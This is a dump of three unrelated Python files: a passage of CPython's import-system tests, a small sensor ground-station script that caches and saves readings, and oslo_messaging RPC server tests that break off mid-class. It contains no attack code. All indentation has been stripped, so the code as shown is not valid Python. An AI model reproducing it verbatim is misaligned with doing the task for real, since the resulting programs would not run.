mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
Because of the peculiar requirements of this function, these are
deliberately whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = True
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = False
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
def test_crossreference1(self):
import test.test_import.data.circular_imports.use
import test.test_import.data.circular_imports.source
def test_crossreference2(self):
with self.assertRaises(AttributeError) as cm:
import test.test_import.data.circular_imports.source
errmsg = str(cm.exception)
self.assertIn('test.test_import.data.circular_imports.source', errmsg)
self.assertIn('spam', errmsg)
self.assertIn('partially initialized module', errmsg)
self.assertIn('circular import', errmsg)
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
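# --- Illustrative sketch (not part of the original test suite) ---
# Several tests above (FilePermissionTests, PycacheTests) lean on the
# PEP 3147/488 cache layout.  The mapping between a source file and its
# cached bytecode is exposed by importlib.util; 'spam.py' is a hypothetical
# file name used purely for illustration.
def _demo_pep3147_paths():
    import importlib.util
    pyc = importlib.util.cache_from_source('spam.py')
    # e.g. '__pycache__/spam.cpython-<tag>.pyc' -- the tag depends on the interpreter
    src = importlib.util.source_from_cache(pyc)
    assert src.endswith('spam.py')
    return pyc, src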
|
DaloyGround.py
|
from NRFReader import NRFReader
from WebServer import WebServer
from DataIO import DataIO
from threading import Thread
import os
class Singleton:
def __init__(self):
self.reader = NRFReader()
self.server = WebServer()
self.io = DataIO()
self.packets = []
self.packetId = 0
self.clear = False
self.backupSize = 15 # flush every 15 packets (15 s at the 1 Hz refresh rate)
self.refreshRate = 1 # 1 Hz
def clearCache(self):
self.packets[:] = []
def registerEntry(self, packet):
if self.clear:
self.clearCache()
self.clear = False
entry = {"id": self.packetId, "temperature": packet[0], "humidity": packet[1], "pressure": packet[2], "altitude": packet[3]}
self.packets.append(entry)
# flush cache
if len(self.packets) == self.backupSize and self.packetId > 0:
thread = Thread(target=self.io.saveData, args=(self.packets[:],))
thread.start()
self.clear = True
self.packetId += 1
def initServer(self):
self.server.initServer()
def startListening(self):
self.reader.start()
def getLatestEntry(self):
if len(self.packets) > 0:
return self.packets[-1]
else:
return {"id": -1, "temperature": 0, "humidity": 0, "pressure": 0, "altitude": 0}
def getAllEntries(self):
self.io.saveData(self.packets[:])
csv = self.io.readData()
return csv
instance = Singleton()
if __name__ == "__main__":
instance.initServer()
instance.startListening()
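# --- Illustrative usage sketch (not part of the original module) ---
# registerEntry() expects a 4-tuple (temperature, humidity, pressure,
# altitude); once backupSize packets have accumulated it hands a copy of the
# cache to DataIO.saveData on a background thread and marks the cache for
# clearing on the next call.  The sensor values below are made up.
def _demo_register_entries(ground):
    for step in range(ground.backupSize + 1):
        ground.registerEntry((21.5, 40.0, 1013.2, 120.0 + step))
    # The latest entry is always available, even right after a flush cycle.
    return ground.getLatestEntry()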
|
test_server.py
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import time
import threading
from oslo_config import cfg
import testscenarios
import mock
import oslo_messaging
from oslo_messaging import server as server_module
from oslo_messaging.tests import utils as test_utils
load_tests = testscenarios.load_tests_apply_scenarios
class ServerSetupMixin(object):
class Server(threading.Thread):
def __init__(self, transport, topic, server, endpoint, serializer):
self.controller = ServerSetupMixin.ServerController()
target = oslo_messaging.Target(topic=topic, server=server)
self.server = oslo_messaging.get_rpc_server(transport,
target,
[endpoint,
self.controller],
serializer=serializer)
super(ServerSetupMixin.Server, self).__init__()
self.daemon = True
def wait(self):
# Wait for the executor to process the stop message, indicating all
# test messages have been processed
self.controller.stopped.wait()
# Check start() does nothing with a running server
self.server.start()
self.server.stop()
self.server.wait()
def run(self):
self.server.start()
class ServerController(object):
def __init__(self):
self.stopped = threading.Event()
def stop(self, ctxt):
self.stopped.set()
class TestSerializer(object):
def serialize_entity(self, ctxt, entity):
return ('s' + entity) if entity else entity
def deserialize_entity(self, ctxt, entity):
return ('d' + entity) if entity else entity
def serialize_context(self, ctxt):
return dict([(k, 's' + v) for k, v in ctxt.items()])
def deserialize_context(self, ctxt):
return dict([(k, 'd' + v) for k, v in ctxt.items()])
def __init__(self):
self.serializer = self.TestSerializer()
def _setup_server(self, transport, endpoint, topic=None, server=None):
server = self.Server(transport,
topic=topic or 'testtopic',
server=server or 'testserver',
endpoint=endpoint,
serializer=self.serializer)
thread = threading.Thread(target=server.start)
thread.daemon = True
thread.start()
return server
def _stop_server(self, client, server, topic=None):
if topic is not None:
client = client.prepare(topic=topic)
client.cast({}, 'stop')
server.wait()
def _setup_client(self, transport, topic='testtopic'):
return oslo_messaging.RPCClient(transport,
oslo_messaging.Target(topic=topic),
serializer=self.serializer)
class TestRPCServer(test_utils.BaseTestCase, ServerSetupMixin):
def __init__(self, *args):
super(TestRPCServer, self).__init__(*args)
ServerSetupMixin.__init__(self)
def setUp(self):
super(TestRPCServer, self).setUp(conf=cfg.ConfigOpts())
def test_constructor(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
target = oslo_messaging.Target(topic='foo', server='bar')
endpoints = [object()]
serializer = object()
server = oslo_messaging.get_rpc_server(transport, target, endpoints,
serializer=serializer)
self.assertIs(server.conf, self.conf)
self.assertIs(server.transport, transport)
self.assertIsInstance(server.dispatcher, oslo_messaging.RPCDispatcher)
self.assertIs(server.dispatcher.endpoints, endpoints)
self.assertIs(server.dispatcher.serializer, serializer)
self.assertEqual('blocking', server.executor)
def test_server_wait_method(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
target = oslo_messaging.Target(topic='foo', server='bar')
endpoints = [object()]
serializer = object()
class MagicMockIgnoreArgs(mock.MagicMock):
'''A MagicMock which can never misinterpret the arguments passed to
it during construction.'''
def __init__(self, *args, **kwargs):
super(MagicMockIgnoreArgs, self).__init__()
server = oslo_messaging.get_rpc_server(transport, target, endpoints,
serializer=serializer)
# Mocking executor
server._executor_cls = MagicMockIgnoreArgs
# Capture the executor's listener before calling wait(), because wait()
# resets the executor to None.
server.start()
listener = server._executor_obj.listener
server.stop()
# call server wait method
server.wait()
self.assertIsNone(server._executor_obj)
self.assertEqual(1, listener.cleanup.call_count)
def test_no_target_server(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
server = oslo_messaging.get_rpc_server(
transport,
oslo_messaging.Target(topic='testtopic'),
[])
try:
server.start()
except Exception as ex:
self.assertIsInstance(ex, oslo_messaging.InvalidTarget, ex)
self.assertEqual('testtopic', ex.target.topic)
else:
self.assertTrue(False)
def test_no_server_topic(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
target = oslo_messaging.Target(server='testserver')
server = oslo_messaging.get_rpc_server(transport, target, [])
try:
server.start()
except Exception as ex:
self.assertIsInstance(ex, oslo_messaging.InvalidTarget, ex)
self.assertEqual('testserver', ex.target.server)
else:
self.assertTrue(False)
def _test_no_client_topic(self, call=True):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
client = self._setup_client(transport, topic=None)
method = client.call if call else client.cast
try:
method({}, 'ping', arg='foo')
except Exception as ex:
self.assertIsInstance(ex, oslo_messaging.InvalidTarget, ex)
self.assertIsNotNone(ex.target)
else:
self.assertTrue(False)
def test_no_client_topic_call(self):
self._test_no_client_topic(call=True)
def test_no_client_topic_cast(self):
self._test_no_client_topic(call=False)
def test_client_call_timeout(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
finished = False
wait = threading.Condition()
class TestEndpoint(object):
def ping(self, ctxt, arg):
with wait:
if not finished:
wait.wait()
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
try:
client.prepare(timeout=0).call({}, 'ping', arg='foo')
except Exception as ex:
self.assertIsInstance(ex, oslo_messaging.MessagingTimeout, ex)
else:
self.assertTrue(False)
with wait:
finished = True
wait.notify()
self._stop_server(client, server_thread)
def test_unknown_executor(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
try:
oslo_messaging.get_rpc_server(transport, None, [], executor='foo')
except Exception as ex:
self.assertIsInstance(ex, oslo_messaging.ExecutorLoadFailure)
self.assertEqual('foo', ex.executor)
else:
self.assertTrue(False)
def test_cast(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
def __init__(self):
self.pings = []
def ping(self, ctxt, arg):
self.pings.append(arg)
endpoint = TestEndpoint()
server_thread = self._setup_server(transport, endpoint)
client = self._setup_client(transport)
client.cast({}, 'ping', arg='foo')
client.cast({}, 'ping', arg='bar')
self._stop_server(client, server_thread)
self.assertEqual(['dsfoo', 'dsbar'], endpoint.pings)
def test_call(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
def ping(self, ctxt, arg):
return arg
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
self.assertIsNone(client.call({}, 'ping', arg=None))
self.assertEqual(0, client.call({}, 'ping', arg=0))
self.assertEqual(False, client.call({}, 'ping', arg=False))
self.assertEqual([], client.call({}, 'ping', arg=[]))
self.assertEqual({}, client.call({}, 'ping', arg={}))
self.assertEqual('dsdsfoo', client.call({}, 'ping', arg='foo'))
self._stop_server(client, server_thread)
def test_direct_call(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
def ping(self, ctxt, arg):
return arg
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
direct = client.prepare(server='testserver')
self.assertIsNone(direct.call({}, 'ping', arg=None))
self.assertEqual(0, direct.call({}, 'ping', arg=0))
self.assertEqual(False, direct.call({}, 'ping', arg=False))
self.assertEqual([], direct.call({}, 'ping', arg=[]))
self.assertEqual({}, direct.call({}, 'ping', arg={}))
self.assertEqual('dsdsfoo', direct.call({}, 'ping', arg='foo'))
self._stop_server(client, server_thread)
def test_context(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
def ctxt_check(self, ctxt, key):
return ctxt[key]
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
self.assertEqual('dsdsb',
client.call({'dsa': 'b'},
'ctxt_check',
key='a'))
self._stop_server(client, server_thread)
def test_failure(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
def ping(self, ctxt, arg):
raise ValueError(arg)
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
try:
client.call({}, 'ping', arg='foo')
except Exception as ex:
self.assertIsInstance(ex, ValueError)
self.assertEqual('dsfoo', str(ex))
else:
self.assertTrue(False)
self._stop_server(client, server_thread)
def test_expected_failure(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
@oslo_messaging.expected_exceptions(ValueError)
def ping(self, ctxt, arg):
raise ValueError(arg)
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
try:
client.call({}, 'ping', arg='foo')
except Exception as ex:
self.assertIsInstance(ex, ValueError)
self.assertEqual('dsfoo', str(ex))
else:
self.assertTrue(False)
self._stop_server(client, server_thread)
class TestMultipleServers(test_utils.BaseTestCase, ServerSetupMixin):
_exchanges = [
('same_exchange', dict(exchange1=None, exchange2=None)),
('diff_exchange', dict(exchange1='x1', exchange2='x2')),
]
_topics = [
('same_topic', dict(topic1='t', topic2='t')),
('diff_topic', dict(topic1='t1', topic2='t2')),
]
_server = [
('same_server', dict(server1=None, server2=None)),
('diff_server', dict(server1='s1', server2='s2')),
]
_fanout = [
('not_fanout', dict(fanout1=None, fanout2=None)),
('fanout', dict(fanout1=True, fanout2=True)),
]
_method = [
('call', dict(call1=True, call2=True)),
('cast', dict(call1=False, call2=False)),
]
_endpoints = [
('one_endpoint',
dict(multi_endpoints=False,
expect1=['ds1', 'ds2'],
expect2=['ds1', 'ds2'])),
('two_endpoints',
dict(multi_endpoints=True,
expect1=['ds1'],
expect2=['ds2'])),
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._exchanges,
cls._topics,
cls._server,
cls._fanout,
cls._method,
cls._endpoints)
# fanout call not supported
def filter_fanout_call(scenario):
params = scenario[1]
fanout = params['fanout1'] or params['fanout2']
call = params['call1'] or params['call2']
return not (call and fanout)
# listening multiple times on same topic/server pair not supported
def filter_same_topic_and_server(scenario):
params = scenario[1]
single_topic = params['topic1'] == params['topic2']
single_server = params['server1'] == params['server2']
return not (single_topic and single_server)
# fanout to multiple servers on same topic and exchange
# each endpoint will receive both messages
def fanout_to_servers(scenario):
params = scenario[1]
fanout = params['fanout1'] or params['fanout2']
single_exchange = params['exchange1'] == params['exchange2']
single_topic = params['topic1'] == params['topic2']
multi_servers = params['server1'] != params['server2']
if fanout and single_exchange and single_topic and multi_servers:
params['expect1'] = params['expect1'][:] + params['expect1']
params['expect2'] = params['expect2'][:] + params['expect2']
return scenario
# multiple endpoints on same topic and exchange
# either endpoint can get either message
def single_topic_multi_endpoints(scenario):
params = scenario[1]
single_exchange = params['exchange1'] == params['exchange2']
single_topic = params['topic1'] == params['topic2']
if single_topic and single_exchange and params['multi_endpoints']:
params['expect_either'] = (params['expect1'] +
params['expect2'])
params['expect1'] = params['expect2'] = []
else:
params['expect_either'] = []
return scenario
for f in [filter_fanout_call, filter_same_topic_and_server]:
cls.scenarios = filter(f, cls.scenarios)
for m in [fanout_to_servers, single_topic_multi_endpoints]:
cls.scenarios = map(m, cls.scenarios)
def __init__(self, *args):
super(TestMultipleServers, self).__init__(*args)
ServerSetupMixin.__init__(self)
def setUp(self):
super(TestMultipleServers, self).setUp(conf=cfg.ConfigOpts())
def test_multiple_servers(self):
url1 = 'fake:///' + (self.exchange1 or '')
url2 = 'fake:///' + (self.exchange2 or '')
transport1 = oslo_messaging.get_transport(self.conf, url=url1)
if url1 != url2:
transport2 = oslo_messaging.get_transport(self.conf, url=url2)
else:
transport2 = transport1
class TestEndpoint(object):
def __init__(self):
self.pings = []
